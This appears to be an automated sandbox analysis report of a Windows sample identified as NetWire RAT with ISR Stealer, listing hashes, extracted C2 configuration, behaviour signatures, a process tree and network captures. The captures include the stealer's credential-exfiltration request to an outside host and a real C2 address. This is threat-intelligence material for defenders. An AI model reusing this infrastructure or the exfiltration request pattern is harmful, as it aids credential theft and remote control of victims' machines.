Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  • submitted
    30/04/2024, 14:35 UTC

General

  • Target

    09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe

  • Size

    989KB

  • MD5

    09f7912493d7b995e0d765387b8ce2a1

  • SHA1

    0bcf195f1a77e3d02c67b532780796fb1a37d25f

  • SHA256

    5927e4d65f85b8656396c8f02379f3954d38f19ac63e9d00596f666f6dc796ab

  • SHA512

    97cd60f9afca58ccd0b52d54ac9b0f4ea8f7c2d03a500ee16df7e1d3ce1a1c4fca13ee5e919e4787c44729a4bff45a28f9831e07259649064e77de889be1dba1

  • SSDEEP

    12288:FCvX+LmZFa2rGkXVuOTb51KIyISYsBEa5D8FF3eDwI6md1AxLoHxWpgXX:04Q5GkvdUIyISY+5ouD9t1C8HxW

Malware Config

Extracted

Family

netwire

C2

91.192.100.25:3369

Attributes
  • activex_autorun

    true

  • activex_key

    {3757GA31-8R2X-4686-5K7C-I4FIR5682QEX}

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • lock_executable

    false

  • offline_keylogger

    false

  • password

    Password

  • registry_autorun

    true

  • startup_name

    NetWire

  • use_mutex

    false

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in Visual Basic.

  • ISR Stealer payload 1 IoCs
  • NetWire RAT payload 2 IoCs
  • Netwire

    Netwire is a RAT whose main functionality is focused on password stealing and keylogging, but it also includes remote control capabilities.

  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients.

  • Nirsoft 2 IoCs
  • Modifies Installed Components in the registry 2 TTPs 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar information.

  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\Desktop\Server.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Users\Admin\Desktop\Server.exe
        "C:\Users\Admin\Desktop\Server.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Users\Admin\Desktop\Server.exe
          /scomma "C:\Users\Admin\AppData\Local\Temp\qvYPLwBnc5.ini"
          4⤵
          • Executes dropped EXE
          PID:2544
        • C:\Users\Admin\Desktop\Server.exe
          /scomma "C:\Users\Admin\AppData\Local\Temp\lAOOcdAq7n.ini"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook accounts
          PID:1572
    • C:\Users\Admin\AppData\Local\Temp\09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Adds Run key to start application
      PID:1628

Network

  • flag-us
    DNS
    riyanshoppingbags.com
    Server.exe
    Remote address:
    8.8.8.8:53
    Request
    riyanshoppingbags.com
    IN A
    Response
    riyanshoppingbags.com
    IN A
    212.32.237.91
  • flag-nl
    GET
    http://riyanshoppingbags.com/skins/betpla/PHP/index.php?action=add&username=&password=&app=&pcname=GHPZRGFC&sitename=
    Server.exe
    Remote address:
    212.32.237.91:80
    Request
    GET /skins/betpla/PHP/index.php?action=add&username=&password=&app=&pcname=GHPZRGFC&sitename= HTTP/1.1
    User-Agent: HardCore Software For : Public
    Host: riyanshoppingbags.com
    Response
    HTTP/1.1 429 Too Many Requests
    cache-control: max-age=0, private, must-revalidate
    connection: close
    content-length: 17
    date: Tue, 30 Apr 2024 14:35:38 GMT
    server: nginx
    set-cookie: sid=ea069c54-06fe-11ef-8e25-a473ffc9c576; path=/; domain=.riyanshoppingbags.com; expires=Sun, 18 May 2092 17:49:45 GMT; max-age=2147483647; HttpOnly
  • 212.32.237.91:80
    http://riyanshoppingbags.com/skins/betpla/PHP/index.php?action=add&username=&password=&app=&pcname=GHPZRGFC&sitename=
    http
    Server.exe
    409 B
    560 B
    5
    5

    HTTP Request

    GET http://riyanshoppingbags.com/skins/betpla/PHP/index.php?action=add&username=&password=&app=&pcname=GHPZRGFC&sitename=

    HTTP Response

    429
  • 91.192.100.25:3369
    09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe
    152 B
    120 B
    3
    3
  • 91.192.100.25:3369
    09f7912493d7b995e0d765387b8ce2a1_JaffaCakes118.exe
    152 B
    120 B
    3
    3
  • 8.8.8.8:53
    riyanshoppingbags.com
    dns
    Server.exe
    67 B
    83 B
    1
    1

    DNS Request

    riyanshoppingbags.com

    DNS Response

    212.32.237.91

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\qvYPLwBnc5.ini

    Filesize

    5B

    MD5

    d1ea279fb5559c020a1b4137dc4de237

    SHA1

    db6f8988af46b56216a6f0daf95ab8c9bdb57400

    SHA256

    fcdcc2c46896915a1c695d6231f0fee336a668531b7a3da46178c80362546dba

    SHA512

    720e9c284f0559015312df7fe977563e5e16f48d3506e51eb4016adf7971924d352f740b030aa3adc81b6f65fd1dba12df06d10fa6c115074e5097e7ee0f08b3

  • C:\Users\Admin\Desktop\Server.exe

    Filesize

    260KB

    MD5

    e8f2b14ab5381c021c8085c43be1804b

    SHA1

    d10afc60fb1347b2b3c44fee4456fa94bcf95b8f

    SHA256

    7557fabff96ad819525f43a133680cc1ef3acb61a5f8e3df4c385b6244ad6fed

    SHA512

    2dd2cee9ba3a1e327fa517cbe81fb0180e6216932df1cb9581ed4e4b9a0ff54b50c875629aaa2e17af91172b60d65ca326b4690a4ca182b88913cfb87c12e7cc

  • memory/1572-33-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

  • memory/1572-30-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

  • memory/1572-29-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

  • memory/1572-26-0x0000000000400000-0x000000000041F000-memory.dmp

    Filesize

    124KB

  • memory/1628-38-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

  • memory/1628-37-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

  • memory/1888-34-0x0000000074590000-0x0000000074C7E000-memory.dmp

    Filesize

    6.9MB

  • memory/1888-3-0x0000000004990000-0x00000000049D0000-memory.dmp

    Filesize

    256KB

  • memory/1888-0-0x0000000000B60000-0x0000000000C5C000-memory.dmp

    Filesize

    1008KB

  • memory/1888-35-0x0000000004990000-0x00000000049D0000-memory.dmp

    Filesize

    256KB

  • memory/1888-36-0x0000000004990000-0x00000000049D0000-memory.dmp

    Filesize

    256KB

  • memory/1888-2-0x0000000000330000-0x000000000034E000-memory.dmp

    Filesize

    120KB

  • memory/1888-1-0x0000000074590000-0x0000000074C7E000-memory.dmp

    Filesize

    6.9MB

  • memory/1888-39-0x0000000074590000-0x0000000074C7E000-memory.dmp

    Filesize

    6.9MB

  • memory/2544-22-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

  • memory/2544-20-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

  • memory/2544-19-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

  • memory/2544-18-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

  • memory/2544-14-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB
